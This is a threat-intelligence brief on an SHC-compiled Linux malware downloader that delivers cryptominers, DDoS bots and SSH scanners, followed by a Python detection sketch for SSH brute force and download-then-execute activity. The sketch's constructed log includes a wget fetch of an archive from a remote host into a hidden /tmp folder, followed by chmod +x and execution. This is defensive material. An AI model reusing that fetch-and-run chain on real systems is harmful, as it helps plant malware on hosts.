2023-01-11

Linux Malware Downloader Uses Shell Script Compiler for Cryptomining & DDoS

Category: Malware Campaign | Industry: Global | Level: Tactical | Source: ASEC

Researchers from the ASEC analysis team have identified a new Linux malware downloader built with the Shell Script Compiler (SHC). SHC turns a Bash script into an ELF executable that carries the original script RC4-encrypted and decrypts it only at runtime before handing it to the shell, so the script body does not appear in the file for string-based scanning; this is the evasion the downloader relies on. ASEC uncovered the SHC loader from a VirusTotal submission made by a Korean user, and further tracking of submissions showed it is used primarily in attacks against systems in Korea. Initial access is assessed to be SSH brute force: "It is presumed that after successful authentication through a dictionary attack on inadequately managed Linux SSH servers, various malware was installed on the target system." The payloads the script downloads are archive files containing the XMRig CoinMiner, a DDoS IRC bot, or an SSH scanner. For responders, the compiled script is an obstacle to static triage rather than to analysis: the plaintext has to exist in the running process for the shell to execute it, and the downloader's observable behaviour (an SSH login from a brute-forcing source, an archive fetched from a remote host, then extracted and run) is what the use cases below key on.

Anvilogic Scenario:

  • Unix File Download, Modified, Executed

Anvilogic Use Cases:

  • SSH Brute Force detection
  • File Download (Unix)
  • File Modified for Execution
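
As an added example (not code from ASEC or Anvilogic), the Python below sketches the two detections the use cases above describe, run over constructed sshd and process-start log lines: an SSH dictionary attack that ends in an accepted login, and a download, chmod +x, execute sequence inside one parent session. The thresholds, the pipe-delimited process event format, the `ssh_bruteforce_success` and `download_modify_execute` names, and the way the download destination is parsed from `wget -O` / `curl -o` are all assumptions made for the illustration.

```python
"""Detection sketch for the chain this report describes: SSH dictionary attack,
then a downloader fetching an archive, marking a file executable and running it.
Added example, not ASEC's or Anvilogic's code; all log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in auth.log layout (no year field, as in real syslog).
AUTH_LOG = """\
Jan 11 03:12:01 host sshd[2201]: Failed password for root from 203.0.113.5 port 51234 ssh2
Jan 11 03:12:03 host sshd[2203]: Failed password for root from 203.0.113.5 port 51236 ssh2
Jan 11 03:12:04 host sshd[2205]: Failed password for root from 203.0.113.5 port 51238 ssh2
Jan 11 03:12:06 host sshd[2207]: Failed password for root from 203.0.113.5 port 51240 ssh2
Jan 11 03:12:07 host sshd[2209]: Failed password for root from 203.0.113.5 port 51242 ssh2
Jan 11 03:12:09 host sshd[2211]: Accepted password for root from 203.0.113.5 port 51244 ssh2
Jan 11 03:40:00 host sshd[2300]: Failed password for admin from 198.51.100.7 port 40001 ssh2
Jan 11 03:41:00 host sshd[2302]: Accepted publickey for admin from 198.51.100.7 port 40002 ssh2
"""

# Constructed process-start events, one per line: ts|user|pid|ppid|cwd|command.
# A real source would be auditd execve records or an EDR process feed.
PROC_LOG = """\
2023-01-11T03:12:20|root|3001|2950|/tmp|wget http://203.0.113.5/x.tar.gz -O /tmp/.x/x.tar.gz
2023-01-11T03:12:25|root|3004|2950|/tmp/.x|tar xzf /tmp/.x/x.tar.gz
2023-01-11T03:12:30|root|3006|2950|/tmp/.x|chmod +x /tmp/.x/run
2023-01-11T03:12:31|root|3007|2950|/tmp/.x|/tmp/.x/run
2023-01-11T08:00:00|deploy|4100|4000|/home/deploy|curl -sSL https://example.invalid/app.tgz -o /opt/app/app.tgz
2023-01-11T08:00:05|deploy|4102|4000|/opt/app|tar xzf /opt/app/app.tgz
"""

SSH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+)"
)

def ssh_bruteforce_success(log, threshold=5, window=timedelta(minutes=10), year=2023):
    """(src, user, accept_ts) for every accepted login preceded by at least
    `threshold` failures from the same source inside `window`."""
    failures = defaultdict(list)  # src -> timestamps of failed attempts
    hits = []
    for line in log.splitlines():
        m = SSH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        if m["result"] == "Failed":
            failures[m["src"]].append(ts)
        elif sum(ts - t <= window for t in failures[m["src"]]) >= threshold:
            hits.append((m["src"], m["user"], ts.isoformat()))
    return hits

DOWNLOADERS = {"wget", "curl"}

def output_path(argv):
    """Explicit destination of `wget ... -O file` or `curl ... -o file`, else None.
    Other forms (curl -O, default wget naming) are left out of this sketch."""
    for flag in ("-O", "-o"):
        if flag in argv and argv.index(flag) + 1 < len(argv):
            return argv[argv.index(flag) + 1]
    return None

def download_modify_execute(log, window=timedelta(minutes=30)):
    """(user, ppid, path, exec_ts) when one parent session downloads into a
    directory, chmod +x's a file there (absolute path assumed), then runs it."""
    downloaded_dir = {}  # ppid -> (directory written to, download ts)
    made_exec = defaultdict(set)  # ppid -> paths chmod +x'd inside that dir
    alerts = []
    for line in log.splitlines():
        ts_s, user, _pid, ppid, _cwd, cmd = line.split("|", 5)
        ts, argv = datetime.fromisoformat(ts_s), cmd.split()
        name = argv[0].rsplit("/", 1)[-1]
        dest = output_path(argv) if name in DOWNLOADERS else None
        if dest:
            downloaded_dir[ppid] = (dest.rsplit("/", 1)[0], ts)
        elif name == "chmod" and "+x" in argv and ppid in downloaded_dir:
            d, t0 = downloaded_dir[ppid]
            if argv[-1].startswith(d + "/") and ts - t0 <= window:
                made_exec[ppid].add(argv[-1])
        elif argv[0] in made_exec[ppid]:
            alerts.append((user, ppid, argv[0], ts.isoformat()))
    return alerts

if __name__ == "__main__":
    for h in ssh_bruteforce_success(AUTH_LOG):
        print("SSH brute force followed by success:", h)
    for a in download_modify_execute(PROC_LOG):
        print("download -> chmod +x -> execute:", a)
```

The constructed data gives one hit per detector: the root login from 203.0.113.5 after five failures, and the `/tmp/.x/run` execution in the same session that fetched the archive; the deploy session downloads and extracts but never marks or runs anything, so it stays quiet. Because the payloads in this campaign arrive as archives, a production rule should also treat extraction into the download directory as the "modified" step rather than relying on an explicit chmod, and on hosts that should never see password authentication the SSH threshold belongs far lower than five.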